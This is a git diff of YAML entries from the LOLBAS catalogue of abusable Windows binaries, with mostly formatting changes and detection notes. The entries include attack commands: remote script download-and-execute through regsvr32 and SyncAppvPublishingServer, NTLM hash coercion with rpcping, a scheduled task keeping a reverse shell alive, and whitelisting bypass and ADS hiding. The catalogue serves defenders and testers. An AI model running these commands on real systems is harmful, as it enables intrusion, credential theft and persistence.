MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
@ -51,4 +51,4 @@ Acknowledgement:
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Netsh.exe
|
||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-12-24'
|
||||
Created: 2019-12-24
|
||||
Commands:
|
||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Netsh initiating a network connection
|
||||
@ -32,4 +32,4 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Odbcconf.exe
|
||||
Description: Used in Windows for managing ODBC connections
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcalua.exe
|
||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -41,4 +41,4 @@ Acknowledgement:
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcwrun.exe
|
||||
Description: Program Compatibility Wizard
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -23,4 +23,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pktmon.exe
|
||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||
Author: 'Derek Johnson'
|
||||
Created: '2020-08-12'
|
||||
Created: 2020-08-12
|
||||
Commands:
|
||||
- Command: pktmon.exe start --etw
|
||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\pktmon.exe
|
||||
- Path: c:\windows\syswow64\pktmon.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: .etl files found on system
|
||||
Resources:
|
||||
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Presentationhost.exe
|
||||
Description: File is used for executing Browser applications
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||
Description: Executes the target XAML Browser Application (XBAP) file
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Print.exe
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
@ -42,4 +42,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Psr.exe
|
||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||
Author: Leon Rodenko
|
||||
Created: '2020-06-27'
|
||||
Created: 2020-06-27
|
||||
Commands:
|
||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||
@ -15,9 +15,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\psr.exe
|
||||
- Path: c:\windows\syswow64\psr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: psr.exe spawned
|
||||
- IOC: suspicious activity when running with "/gui 0" flag
|
||||
Resources:
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Rasautou.exe
|
||||
Description: Windows Remote Access Dialer
|
||||
Author: 'Tony Lambert'
|
||||
Created: '2020-01-10'
|
||||
Created: 2020-01-10
|
||||
Commands:
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||
Usecase: Execute DLL code
|
||||
Category: Execute
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rasautou.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: rasautou.exe command line containing -d and -p
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: FireEye
|
||||
Handle: '@FireEye'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Reg.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: reg.exe writing to an ADS
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Regasm.exe
|
||||
Description: Part of .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: Execute
|
||||
@ -25,7 +25,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regasm.exe executing dll file
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regedit.exe
|
||||
Description: Used by Windows to manipulate registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regedit.exe reading and writing to alternate data stream
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regini.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2020-07-03'
|
||||
Created: 2020-07-03
|
||||
Commands:
|
||||
- Command: regini.exe newfile.txt:hidden.ini
|
||||
Description: Write registry keys from data inside the Alternate data stream.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regini.exe
|
||||
- Path: C:\Windows\SysWOW64\regini.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regini.exe reading from ADS
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
Handle: '@elisalem9'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Register-cimprovider.exe
|
||||
Description: Used to register new wmi providers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Description: Load the target .DLL.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvcs.exe
|
||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvr32.exe
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regsvr32.exe getting files from Internet
|
||||
@ -51,4 +51,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Replace.exe
|
||||
Description: Used to replace file with another file
|
||||
Description: Used to replace file with another file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy file.cab to destination
|
||||
Usecase: Copy files
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Description: Download/Copy bar.exe to outdir
|
||||
Usecase: Download file
|
||||
Usecase: Download file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Replace.exe getting files from remote server
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rpcping.exe
|
||||
Description: Used to verify rpc connection
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -28,4 +28,4 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Vincent Yiu
|
||||
Handle: '@vysecurity'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rundll32.exe
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
@ -65,13 +65,13 @@ Commands:
|
||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Runonce.exe /AlternateShellStartup
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Description: Execute the PowerShell script named test.txt
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Event 4014 - Powershell logging
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Sc.exe
|
||||
Description: Used by Windows to manage services
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
Usecase: Execute binary file hidden inside an alternate data stream
|
||||
Category: ADS
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Schtasks.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||
Description: Create a recurring task to execute every minute.
|
||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||
Category: Execute
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Scriptrunner.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||
Description: Executes calc.exe
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\scriptrunner.exe
|
||||
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||
@ -34,4 +34,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@nicktyrer'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: SyncAppvPublishingServer.exe
|
||||
Description: Used by App-v to get App-v server lists
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Description: Example command on how inject Powershell code into the process
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Landers
|
||||
Handle: '@monoxgas'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ttdinject.exe
|
||||
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
|
||||
Author: 'Maxime Nadeau'
|
||||
Created: '2020-05-12'
|
||||
Created: 2020-05-12
|
||||
Commands:
|
||||
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
|
||||
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\ttdinject.exe
|
||||
- Path: C:\Windows\Syswow64\ttdinject.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Parent child relationship. Ttdinject.exe parent for executed command
|
||||
- IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
|
||||
Resources:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Tttracer.exe
|
||||
Description: Used by Windows 1809 and newer to Debug Time Travel
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-11-5'
|
||||
Created: 2019-11-05
|
||||
Commands:
|
||||
- Command: tttracer.exe C:\windows\system32\calc.exe
|
||||
Description: Execute calc using tttracer.exe. Requires administrator privileges
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\tttracer.exe
|
||||
- Path: C:\Windows\SysWOW64\tttracer.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Parent child relationship. Tttracer parent for executed command
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: vbc.exe
|
||||
Description: Binary file used for compile vbs code
|
||||
Author: Lior Adar
|
||||
Created: 27/02/2020
|
||||
Created: 2020-02-27
|
||||
Commands:
|
||||
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
|
||||
Description: Binary file used by .NET to compile vb code to .exe
|
||||
@ -11,7 +11,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||
OperatingSystem: Windows 10,7
|
||||
OperatingSystem: Windows 10,7
|
||||
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
|
||||
Description: Description of the second command
|
||||
Usecase: A description of the usecase
|
||||
@ -19,11 +19,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||
OperatingSystem: Windows 10,7
|
||||
OperatingSystem: Windows 10,7
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Acknowledgement:
|
||||
- Person: Lior Adar
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Verclsid.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: verclsid.exe /S /C {CLSID}
|
||||
Description: Used to verify a COM object before it is instantiated by Windows Explorer
|
||||
@ -15,10 +15,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\verclsid.exe
|
||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wab.exe
|
||||
Description: Windows address book manager
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wab.exe
|
||||
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: WAB.exe should normally never be used
|
||||
